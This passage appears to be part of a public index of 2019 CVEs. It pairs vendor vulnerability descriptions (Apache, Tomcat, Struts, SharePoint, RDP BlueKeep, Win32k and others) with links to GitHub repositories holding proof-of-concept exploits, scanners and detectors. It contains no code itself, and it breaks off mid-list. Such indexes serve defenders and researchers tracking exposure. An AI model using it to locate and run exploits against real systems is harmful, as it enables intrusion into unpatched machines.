In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.

- [ozkanbilge/Apache-Exploit-2019](https://github.com/ozkanbilge/Apache-Exploit-2019)

### CVE-2019-0217 (2019-04-08)

In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.

- [savsch/PoC_CVE-2019-0217](https://github.com/savsch/PoC_CVE-2019-0217)

### CVE-2019-0227 (2019-05-01)

A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug-fix commits continue in the project's Axis 1.x Subversion repository; legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2; the latest version is 1.7.9 and is not vulnerable to this issue.

- [ianxtianxt/cve-2019-0227](https://github.com/ianxtianxt/cve-2019-0227)

### CVE-2019-0230 (2020-09-14)

Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.

- [PrinceFPF/CVE-2019-0230](https://github.com/PrinceFPF/CVE-2019-0230)
- [ramoncjs3/CVE-2019-0230](https://github.com/ramoncjs3/CVE-2019-0230)
- [f8al/CVE-2019-0230-PoC](https://github.com/f8al/CVE-2019-0230-PoC)
- [Al1ex/CVE-2019-0230](https://github.com/Al1ex/CVE-2019-0230)
- [tw-eason-tseng/CVE-2019-0230_Struts2S2-059](https://github.com/tw-eason-tseng/CVE-2019-0230_Struts2S2-059)

### CVE-2019-0232 (2019-04-15)

When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).

- [pyn3rd/CVE-2019-0232](https://github.com/pyn3rd/CVE-2019-0232)
- [jas502n/CVE-2019-0232](https://github.com/jas502n/CVE-2019-0232)
- [cyy95/CVE-2019-0232-EXP](https://github.com/cyy95/CVE-2019-0232-EXP)
- [setrus/CVE-2019-0232](https://github.com/setrus/CVE-2019-0232)
- [Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-](https://github.com/Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-)
- [Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232](https://github.com/Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232)
- [jaiguptanick/CVE-2019-0232](https://github.com/jaiguptanick/CVE-2019-0232)
- [xsxtw/CVE-2019-0232](https://github.com/xsxtw/CVE-2019-0232)

### CVE-2019-0539 (2019-01-08)

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0567, CVE-2019-0568.

- [0x43434343/CVE-2019-0539](https://github.com/0x43434343/CVE-2019-0539)

### CVE-2019-0567 (2019-01-08)

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0539, CVE-2019-0568.

- [NatteeSetobol/Chakra-CVE-2019-0567](https://github.com/NatteeSetobol/Chakra-CVE-2019-0567)
- [NatteeSetobol/CVE-2019-0567-MS-Edge](https://github.com/NatteeSetobol/CVE-2019-0567-MS-Edge)

### CVE-2019-0604 (2019-03-06)

A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.

- [linhlhq/CVE-2019-0604](https://github.com/linhlhq/CVE-2019-0604)
- [likekabin/CVE-2019-0604_sharepoint_CVE](https://github.com/likekabin/CVE-2019-0604_sharepoint_CVE)
- [k8gege/CVE-2019-0604](https://github.com/k8gege/CVE-2019-0604)
- [m5050/CVE-2019-0604](https://github.com/m5050/CVE-2019-0604)
- [boxhg/CVE-2019-0604](https://github.com/boxhg/CVE-2019-0604)
- [Gh0st0ne/weaponized-0604](https://github.com/Gh0st0ne/weaponized-0604)
- [davidlebr1/cve-2019-0604-SP2010-netv3.5](https://github.com/davidlebr1/cve-2019-0604-SP2010-netv3.5)

### CVE-2019-0623 (2019-03-06)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.

- [Anti-ghosts/CVE-2019-0623-32-exp](https://github.com/Anti-ghosts/CVE-2019-0623-32-exp)

### CVE-2019-0678 (2019-04-08)

An elevation of privilege vulnerability exists when Microsoft Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability, aka 'Microsoft Edge Elevation of Privilege Vulnerability'.

- [sharmasandeepkr/CVE-2019-0678](https://github.com/sharmasandeepkr/CVE-2019-0678)

### CVE-2019-0708 (2019-05-16)

A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.

- [hook-s3c/CVE-2019-0708-poc](https://github.com/hook-s3c/CVE-2019-0708-poc)
- [SherlockSec/CVE-2019-0708](https://github.com/SherlockSec/CVE-2019-0708)
- [yetiddbb/CVE-2019-0708-PoC](https://github.com/yetiddbb/CVE-2019-0708-PoC)
- [p0p0p0/CVE-2019-0708-exploit](https://github.com/p0p0p0/CVE-2019-0708-exploit)
- [rockmelodies/CVE-2019-0708-Exploit](https://github.com/rockmelodies/CVE-2019-0708-Exploit)
- [anquanscan/CVE-2019-0708](https://github.com/anquanscan/CVE-2019-0708)
- [xiyangzuishuai/Dark-Network-CVE-2019-0708](https://github.com/xiyangzuishuai/Dark-Network-CVE-2019-0708)
- [temp-user-2014/CVE-2019-0708](https://github.com/temp-user-2014/CVE-2019-0708)
- [areusecure/CVE-2019-0708](https://github.com/areusecure/CVE-2019-0708)
- [pry0cc/cve-2019-0708-2](https://github.com/pry0cc/cve-2019-0708-2)
- [sbkcbig/CVE-2019-0708-EXPloit](https://github.com/sbkcbig/CVE-2019-0708-EXPloit)
- [sbkcbig/CVE-2019-0708-EXPloit-3389](https://github.com/sbkcbig/CVE-2019-0708-EXPloit-3389)
- [YSheldon/MS_T120](https://github.com/YSheldon/MS_T120)
- [k8gege/CVE-2019-0708](https://github.com/k8gege/CVE-2019-0708)
- [hotdog777714/RDS_CVE-2019-0708](https://github.com/hotdog777714/RDS_CVE-2019-0708)
- [jiansiting/CVE-2019-0708](https://github.com/jiansiting/CVE-2019-0708)
- [NullByteSuiteDevs/CVE-2019-0708](https://github.com/NullByteSuiteDevs/CVE-2019-0708)
- [thugcrowd/CVE-2019-0708](https://github.com/thugcrowd/CVE-2019-0708)
- [blacksunwen/CVE-2019-0708](https://github.com/blacksunwen/CVE-2019-0708)
- [infenet/CVE-2019-0708](https://github.com/infenet/CVE-2019-0708)
- [n0auth/CVE-2019-0708](https://github.com/n0auth/CVE-2019-0708)
- [gildaaa/CVE-2019-0708](https://github.com/gildaaa/CVE-2019-0708)
- [sbkcbig/CVE-2019-0708-Poc-exploit](https://github.com/sbkcbig/CVE-2019-0708-Poc-exploit)
- [HackerJ0e/CVE-2019-0708](https://github.com/HackerJ0e/CVE-2019-0708)
- [syriusbughunt/CVE-2019-0708](https://github.com/syriusbughunt/CVE-2019-0708)
- [Barry-McCockiner/CVE-2019-0708](https://github.com/Barry-McCockiner/CVE-2019-0708)
- [ShadowBrokers-ExploitLeak/CVE-2019-0708](https://github.com/ShadowBrokers-ExploitLeak/CVE-2019-0708)
- [safly/CVE-2019-0708](https://github.com/safly/CVE-2019-0708)
- [Jaky5155/cve-2019-0708-exp](https://github.com/Jaky5155/cve-2019-0708-exp)
- [fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status](https://github.com/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status)
- [303sec/CVE-2019-0708](https://github.com/303sec/CVE-2019-0708)
- [f8al/CVE-2019-0708-POC](https://github.com/f8al/CVE-2019-0708-POC)
- [blockchainguard/CVE-2019-0708](https://github.com/blockchainguard/CVE-2019-0708)
- [yushiro/CVE-2019-0708](https://github.com/yushiro/CVE-2019-0708)
- [skyshell20082008/CVE-2019-0708-PoC-Hitting-Path](https://github.com/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path)
- [ttsite/CVE-2019-0708-](https://github.com/ttsite/CVE-2019-0708-)
- [ttsite/CVE-2019-0708](https://github.com/ttsite/CVE-2019-0708)
- [biggerwing/CVE-2019-0708-poc](https://github.com/biggerwing/CVE-2019-0708-poc)
- [n1xbyte/CVE-2019-0708](https://github.com/n1xbyte/CVE-2019-0708)
- [freeide/CVE-2019-0708](https://github.com/freeide/CVE-2019-0708)
- [edvacco/CVE-2019-0708-POC](https://github.com/edvacco/CVE-2019-0708-POC)
- [pry0cc/BlueKeepTracker](https://github.com/pry0cc/BlueKeepTracker)
- [zjw88282740/CVE-2019-0708-win7](https://github.com/zjw88282740/CVE-2019-0708-win7)
- [victor0013/CVE-2019-0708](https://github.com/victor0013/CVE-2019-0708)
- [herhe/CVE-2019-0708poc](https://github.com/herhe/CVE-2019-0708poc)
- [l9c/rdp0708scanner](https://github.com/l9c/rdp0708scanner)
- [major203/cve-2019-0708-scan](https://github.com/major203/cve-2019-0708-scan)
- [SugiB3o/Check-vuln-CVE-2019-0708](https://github.com/SugiB3o/Check-vuln-CVE-2019-0708)
- [gobysec/CVE-2019-0708](https://github.com/gobysec/CVE-2019-0708)
- [smallFunction/CVE-2019-0708-POC](https://github.com/smallFunction/CVE-2019-0708-POC)
- [freeide/CVE-2019-0708-PoC-Exploit](https://github.com/freeide/CVE-2019-0708-PoC-Exploit)
- [robertdavidgraham/rdpscan](https://github.com/robertdavidgraham/rdpscan)
- [closethe/CVE-2019-0708-POC](https://github.com/closethe/CVE-2019-0708-POC)
- [SQLDebugger/CVE-2019-0708-Tool](https://github.com/SQLDebugger/CVE-2019-0708-Tool)
- [Rostelecom-CERT/bluekeepscan](https://github.com/Rostelecom-CERT/bluekeepscan)
- [Leoid/CVE-2019-0708](https://github.com/Leoid/CVE-2019-0708)
- [ht0Ruial/CVE-2019-0708Poc-BatchScanning](https://github.com/ht0Ruial/CVE-2019-0708Poc-BatchScanning)
- [oneoy/BlueKeep](https://github.com/oneoy/BlueKeep)
- [infiniti-team/CVE-2019-0708](https://github.com/infiniti-team/CVE-2019-0708)
- [haishanzheng/CVE-2019-0708-generate-hosts](https://github.com/haishanzheng/CVE-2019-0708-generate-hosts)
- [Ekultek/BlueKeep](https://github.com/Ekultek/BlueKeep)
- [UraSecTeam/CVE-2019-0708](https://github.com/UraSecTeam/CVE-2019-0708)
- [Gh0st0ne/rdpscan-BlueKeep](https://github.com/Gh0st0ne/rdpscan-BlueKeep)
- [algo7/bluekeep_CVE-2019-0708_poc_to_exploit](https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit)
- [JasonLOU/CVE-2019-0708](https://github.com/JasonLOU/CVE-2019-0708)
- [AdministratorGithub/CVE-2019-0708](https://github.com/AdministratorGithub/CVE-2019-0708)
- [umarfarook882/CVE-2019-0708](https://github.com/umarfarook882/CVE-2019-0708)
- [HynekPetrak/detect_bluekeep.py](https://github.com/HynekPetrak/detect_bluekeep.py)
- [Pa55w0rd/CVE-2019-0708](https://github.com/Pa55w0rd/CVE-2019-0708)
- [at0mik/CVE-2019-0708-PoC](https://github.com/at0mik/CVE-2019-0708-PoC)
- [cream-sec/CVE-2019-0708-Msf--](https://github.com/cream-sec/CVE-2019-0708-Msf--)
- [ZhaoYukai/CVE-2019-0708](https://github.com/ZhaoYukai/CVE-2019-0708)
- [ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen](https://github.com/ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen)
- [wdfcc/CVE-2019-0708](https://github.com/wdfcc/CVE-2019-0708)
- [cvencoder/cve-2019-0708](https://github.com/cvencoder/cve-2019-0708)
- [ze0r/CVE-2019-0708-exp](https://github.com/ze0r/CVE-2019-0708-exp)
- [mekhalleh/cve-2019-0708](https://github.com/mekhalleh/cve-2019-0708)
- [cve-2019-0708-poc/cve-2019-0708](https://github.com/cve-2019-0708-poc/cve-2019-0708)
- [andripwn/CVE-2019-0708](https://github.com/andripwn/CVE-2019-0708)
- [0xeb-bp/bluekeep](https://github.com/0xeb-bp/bluekeep)
- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708)
- [dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-](https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-)
- [turingcompl33t/bluekeep](https://github.com/turingcompl33t/bluekeep)
- [fade-vivida/CVE-2019-0708-test](https://github.com/fade-vivida/CVE-2019-0708-test)
- [skommando/CVE-2019-0708](https://github.com/skommando/CVE-2019-0708)
- [RickGeex/msf-module-CVE-2019-0708](https://github.com/RickGeex/msf-module-CVE-2019-0708)
- [wqsemc/CVE-2019-0708](https://github.com/wqsemc/CVE-2019-0708)
- [Micr067/CVE-2019-0708RDP-MSF](https://github.com/Micr067/CVE-2019-0708RDP-MSF)
- [FrostsaberX/CVE-2019-0708](https://github.com/FrostsaberX/CVE-2019-0708)
- [0x6b7966/CVE-2019-0708-RCE](https://github.com/0x6b7966/CVE-2019-0708-RCE)
- [qing-root/CVE-2019-0708-EXP-MSF-](https://github.com/qing-root/CVE-2019-0708-EXP-MSF-)
- [distance-vector/CVE-2019-0708](https://github.com/distance-vector/CVE-2019-0708)
- [0xFlag/CVE-2019-0708-test](https://github.com/0xFlag/CVE-2019-0708-test)
- [1aa87148377/CVE-2019-0708](https://github.com/1aa87148377/CVE-2019-0708)
- [coolboy4me/cve-2019-0708_bluekeep_rce](https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce)
- [Cyb0r9/ispy](https://github.com/Cyb0r9/ispy)
- [ulisesrc/-2-CVE-2019-0708](https://github.com/ulisesrc/-2-CVE-2019-0708)
- [worawit/CVE-2019-0708](https://github.com/worawit/CVE-2019-0708)
- [Ameg-yag/Wincrash](https://github.com/Ameg-yag/Wincrash)
- [cbwang505/CVE-2019-0708-EXP-Windows](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows)
- [eastmountyxz/CVE-2019-0708-Windows](https://github.com/eastmountyxz/CVE-2019-0708-Windows)
- [RICSecLab/CVE-2019-0708](https://github.com/RICSecLab/CVE-2019-0708)
- [JSec1337/Scanner-CVE-2019-0708](https://github.com/JSec1337/Scanner-CVE-2019-0708)
- [nochemax/bLuEkEeP-GUI](https://github.com/nochemax/bLuEkEeP-GUI)
- [AaronCaiii/CVE-2019-0708-POC](https://github.com/AaronCaiii/CVE-2019-0708-POC)
- [DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit](https://github.com/DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit)
- [go-bi/CVE-2019-0708-EXP-Windows](https://github.com/go-bi/CVE-2019-0708-EXP-Windows)
- [CircuitSoul/CVE-2019-0708](https://github.com/CircuitSoul/CVE-2019-0708)
- [pywc/CVE-2019-0708](https://github.com/pywc/CVE-2019-0708)
- [bibo318/kali-CVE-2019-0708-lab](https://github.com/bibo318/kali-CVE-2019-0708-lab)
- [lisinan988/CVE-2019-0708-scan](https://github.com/lisinan988/CVE-2019-0708-scan)
- [offensity/CVE-2019-0708](https://github.com/offensity/CVE-2019-0708)
- [CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit](https://github.com/CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit)
- [Ravaan21/Bluekeep-Hunter](https://github.com/Ravaan21/Bluekeep-Hunter)
- [davidfortytwo/bluekeep](https://github.com/davidfortytwo/bluekeep)
- [tranqtruong/Detect-BlueKeep](https://github.com/tranqtruong/Detect-BlueKeep)
- [rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708](https://github.com/rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708)
- [adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC](https://github.com/adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC)
- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)
- [hualy13/CVE-2019-0708-Check](https://github.com/hualy13/CVE-2019-0708-Check)

### CVE-2019-0709 (2019-06-12)

A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0620, CVE-2019-0722.

- [YHZX2013/CVE-2019-0709](https://github.com/YHZX2013/CVE-2019-0709)
- [qq431169079/CVE-2019-0709](https://github.com/qq431169079/CVE-2019-0709)
- [ciakim/CVE-2019-0709](https://github.com/ciakim/CVE-2019-0709)

### CVE-2019-0752 (2019-04-09)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0739, CVE-2019-0753, CVE-2019-0862.

- [ZwCreatePhoton/CVE-2019-0752](https://github.com/ZwCreatePhoton/CVE-2019-0752)

### CVE-2019-0768 (2019-04-09)

A security feature bypass vulnerability exists when the Internet Explorer VBScript execution policy does not properly restrict VBScript under specific conditions, allowing requests that should otherwise be ignored, aka 'Internet Explorer Security Feature Bypass Vulnerability'. This CVE ID is unique from CVE-2019-0761.

- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit)

### CVE-2019-0785 (2019-07-15)

A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server, aka 'Windows DHCP Server Remote Code Execution Vulnerability'.

- [Jaky5155/CVE-2019-0785](https://github.com/Jaky5155/CVE-2019-0785)

### CVE-2019-0803 (2019-04-09)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0859.

- [Iamgublin/CVE-2019-0803](https://github.com/Iamgublin/CVE-2019-0803)
- [ExpLife0011/CVE-2019-0803](https://github.com/ExpLife0011/CVE-2019-0803)

### CVE-2019-0808 (2019-04-09)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.

- [ze0r/cve-2019-0808-poc](https://github.com/ze0r/cve-2019-0808-poc)
- [rakesh143/CVE-2019-0808](https://github.com/rakesh143/CVE-2019-0808)
- [exodusintel/CVE-2019-0808](https://github.com/exodusintel/CVE-2019-0808)
- [bb33bb/CVE-2019-0808-32-64-exp](https://github.com/bb33bb/CVE-2019-0808-32-64-exp)

### CVE-2019-0841 (2019-04-09)

An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0730, CVE-2019-0731, CVE-2019-0796, CVE-2019-0805, CVE-2019-0836.

- [rogue-kdc/CVE-2019-0841](https://github.com/rogue-kdc/CVE-2019-0841)
- [likekabin/CVE-2019-0841](https://github.com/likekabin/CVE-2019-0841)
- [0x00-0x00/CVE-2019-0841-BYPASS](https://github.com/0x00-0x00/CVE-2019-0841-BYPASS)
- [mappl3/CVE-2019-0841](https://github.com/mappl3/CVE-2019-0841)

### CVE-2019-0859 (2019-04-09)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0803.

- [Sheisback/CVE-2019-0859-1day-Exploit](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)

### CVE-2019-0887 (2019-07-15)

A remote code execution vulnerability exists in Remote Desktop Services - formerly known as Terminal Services - when an authenticated attacker abuses clipboard redirection, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.

- [qianshuidewajueji/CVE-2019-0887](https://github.com/qianshuidewajueji/CVE-2019-0887)
- [t43Wiu6/CVE-2019-0887](https://github.com/t43Wiu6/CVE-2019-0887)

### CVE-2019-0888 (2019-06-12)

A remote code execution vulnerability exists in the way that ActiveX Data Objects (ADO) handle objects in memory, aka 'ActiveX Data Objects (ADO) Remote Code Execution Vulnerability'.

- [sophoslabs/CVE-2019-0888](https://github.com/sophoslabs/CVE-2019-0888)

### CVE-2019-0986 (2019-06-12)

An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks, aka 'Windows User Profile Service Elevation of Privilege Vulnerability'.

- [padovah4ck/CVE-2019-0986](https://github.com/padovah4ck/CVE-2019-0986)

### CVE-2019-905

- [xtafnull/CMS-made-simple-sqli-python3](https://github.com/xtafnull/CMS-made-simple-sqli-python3)

### CVE-2019-1006 (2019-07-15)

An authentication bypass vulnerability exists in Windows Communication Foundation (WCF) and Windows Identity Foundation (WIF), allowing signing of SAML tokens with arbitrary symmetric keys, aka 'WCF/WIF SAML Token Authentication Bypass Vulnerability'.

- [521526/CVE-2019-1006](https://github.com/521526/CVE-2019-1006)

### CVE-2019-1040 (2019-06-12)

A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection, aka 'Windows NTLM Tampering Vulnerability'.

- [Ridter/CVE-2019-1040](https://github.com/Ridter/CVE-2019-1040)
- [Ridter/CVE-2019-1040-dcpwn](https://github.com/Ridter/CVE-2019-1040-dcpwn)
- [lazaars/UltraRealy_with_CVE-2019-1040](https://github.com/lazaars/UltraRealy_with_CVE-2019-1040)
- [fox-it/cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
- [QAX-A-Team/dcpwn](https://github.com/QAX-A-Team/dcpwn)

### CVE-2019-1064 (2019-06-12)

An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'.

- [RythmStick/CVE-2019-1064](https://github.com/RythmStick/CVE-2019-1064)
- [0x00-0x00/CVE-2019-1064](https://github.com/0x00-0x00/CVE-2019-1064)
- [attackgithub/CVE-2019-1064](https://github.com/attackgithub/CVE-2019-1064)

### CVE-2019-1068 (2019-07-15)

A remote code execution vulnerability exists in Microsoft SQL Server when it incorrectly handles processing of internal functions, aka 'Microsoft SQL Server Remote Code Execution Vulnerability'.

- [Vulnerability-Playground/CVE-2019-1068](https://github.com/Vulnerability-Playground/CVE-2019-1068)

### CVE-2019-1069 (2019-06-12)

An elevation of privilege vulnerability exists in the way the Task Scheduler Service validates certain file operations, aka 'Task Scheduler Elevation of Privilege Vulnerability'.

- [S3cur3Th1sSh1t/SharpPolarBear](https://github.com/S3cur3Th1sSh1t/SharpPolarBear)

### CVE-2019-1083 (2019-07-15)

A denial of service vulnerability exists when Microsoft Common Object Runtime Library improperly handles web requests, aka '.NET Denial of Service Vulnerability'.

- [stevenseeley/HowCVE-2019-1083Works](https://github.com/stevenseeley/HowCVE-2019-1083Works)

### CVE-2019-1096 (2019-07-15)

An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'.

- [CrackerCat/cve-2019-1096-poc](https://github.com/CrackerCat/cve-2019-1096-poc)

### CVE-2019-1108 (2019-07-29)

An information disclosure vulnerability exists when the Windows RDP client improperly discloses the contents of its memory, aka 'Remote Desktop Protocol Client Information Disclosure Vulnerability'.

- [Lanph3re/cve-2019-1108](https://github.com/Lanph3re/cve-2019-1108)

### CVE-2019-1125 (2019-09-03)

An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries.

To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information that could be used to try to compromise the affected system further.

On January 3, 2018, Microsoft released an advisory and security updates related to a newly-discovered class of hardware vulnerabilities (known as Spectre) involving speculative execution side channels that affect AMD, ARM, and Intel CPUs to varying degrees. This vulnerability, released on August 6, 2019, is a variant of the Spectre Variant 1 speculative execution side channel vulnerability and has been assigned CVE-2019-1125.

Microsoft released a security update on July 9, 2019 that addresses the vulnerability through a software change that mitigates how the CPU speculatively accesses memory. Note that this vulnerability does not require a microcode update from your device OEM.

- [bitdefender/swapgs-attack-poc](https://github.com/bitdefender/swapgs-attack-poc)

### CVE-2019-1132 (2019-07-29)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.

- [Vlad-tri/CVE-2019-1132](https://github.com/Vlad-tri/CVE-2019-1132)
- [petercc/CVE-2019-1132](https://github.com/petercc/CVE-2019-1132)

### CVE-2019-1181 (2019-08-14)

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system's Remote Desktop Service via RDP.

The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.

- [major203/cve-2019-1181](https://github.com/major203/cve-2019-1181)

### CVE-2019-1215 (2019-09-11)

An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1253, CVE-2019-1278, CVE-2019-1303.

- [bluefrostsecurity/CVE-2019-1215](https://github.com/bluefrostsecurity/CVE-2019-1215)

### CVE-2019-1218 (2019-08-14)

A spoofing vulnerability exists in the way Microsoft Outlook iOS software parses specifically crafted email messages. An authenticated attacker could exploit the vulnerability by sending a specially crafted email message to a victim.

The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user.

The security update addresses the vulnerability by correcting how Outlook iOS parses specially crafted email messages.

- [d0gukank/CVE-2019-1218](https://github.com/d0gukank/CVE-2019-1218)

### CVE-2019-1221 (2019-09-11)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'.

- [ZwCreatePhoton/CVE-2019-1221](https://github.com/ZwCreatePhoton/CVE-2019-1221)

### CVE-2019-1253 (2019-09-11)

An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1278, CVE-2019-1303.

- [rogue-kdc/CVE-2019-1253](https://github.com/rogue-kdc/CVE-2019-1253)
- [likekabin/CVE-2019-1253](https://github.com/likekabin/CVE-2019-1253)
- [padovah4ck/CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253)
- [sgabe/CVE-2019-1253](https://github.com/sgabe/CVE-2019-1253)

### CVE-2019-1315 (2019-10-10)

An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles hard links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1339, CVE-2019-1342.

- [Mayter/CVE-2019-1315](https://github.com/Mayter/CVE-2019-1315)

### CVE-2019-1332 (2019-12-10)

A cross-site scripting (XSS) vulnerability exists when Microsoft SQL Server Reporting Services (SSRS) does not properly sanitize a specially-crafted web request to an affected SSRS server, aka 'Microsoft SQL Server Reporting Services XSS Vulnerability'.

- [mbadanoiu/CVE-2019-1332](https://github.com/mbadanoiu/CVE-2019-1332)

### CVE-2019-1351 (2020-01-24)

A tampering vulnerability exists when Git for Visual Studio improperly handles virtual drive paths, aka 'Git for Visual Studio Tampering Vulnerability'.

- [JonasDL/PruebaCVE20191351](https://github.com/JonasDL/PruebaCVE20191351)

### CVE-2019-1367 (2019-09-23)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

- [mandarenmanman/CVE-2019-1367](https://github.com/mandarenmanman/CVE-2019-1367)

### CVE-2019-1385 (2019-11-12)

